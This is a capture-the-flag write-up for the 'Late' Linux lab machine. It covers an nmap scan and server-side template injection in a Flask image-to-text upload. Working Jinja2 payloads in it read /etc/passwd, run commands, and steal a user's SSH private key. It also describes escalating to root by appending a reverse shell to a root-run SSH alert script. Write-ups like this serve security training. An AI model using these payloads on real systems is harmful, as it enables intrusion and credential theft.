Late was an easy rated linux box which had subdomain having the functionality to convert image having some text into a text file, as it was made with flask, the application was vulnerable to SSTI (Server Side Template Injection) through which we can read ssh key svc_acc user, although it was a pain with having the right ratio of the image for payload and the font as it wasn’t parsing the text properly. Having a user shell we can run pspy to see the background processes from which there was ssh-alert.sh being executed and we can append any shell commands into it to get root .
NMAP
Nmap scan report for 10.10.11.156
Host is up (0.14s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
On port 80 it’s using nginx to host a web page and the page has subdomian images.late.htb
Let’s add the domain name in /etc/hosts file
So here let’s try uploading an image with a text and see if it actually converts the image into text form
I grabbed this image for the test and after uploading, we get a file name results.txt with the image text
Foothold
We can test for SSTI since this a flask application as the main page says, jinja2 is normally used for templates, we can try {{7*'7'}} and if it returns 7777777 then it's vulnerable to SSTI and is using jinja2 else if it returns 49 it would be using twig
So to make this work, we can take a screenshot of {{7*'7'}} on a text editor and save it as an image
It works, now it’s time to test for command execution. We can use this payload to test if we can can read files
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}After uploading this we get the /etc/passwd file
Now we can’t get a reverse shell from where even tho we can execute commands
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}Which would return us
Instead we can grab the ssh key for svc_acc
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /home/svc_acc/.ssh/id_rsa').read() }}After getting shell, we can check what’s running in the background for that we can use pspy
On looking at the script it looks like a normal ssh alert which is sent to root’s mail but if we notice in pspy that script is being executed whenever we login through ssh also we can only append content into the script as it’s having a attribute on checking with lasattr
So we just need to add a reverse shell and it will be executed on either logging or logging out from ssh
The script will be executed and we’ll have our reverse shell as root user
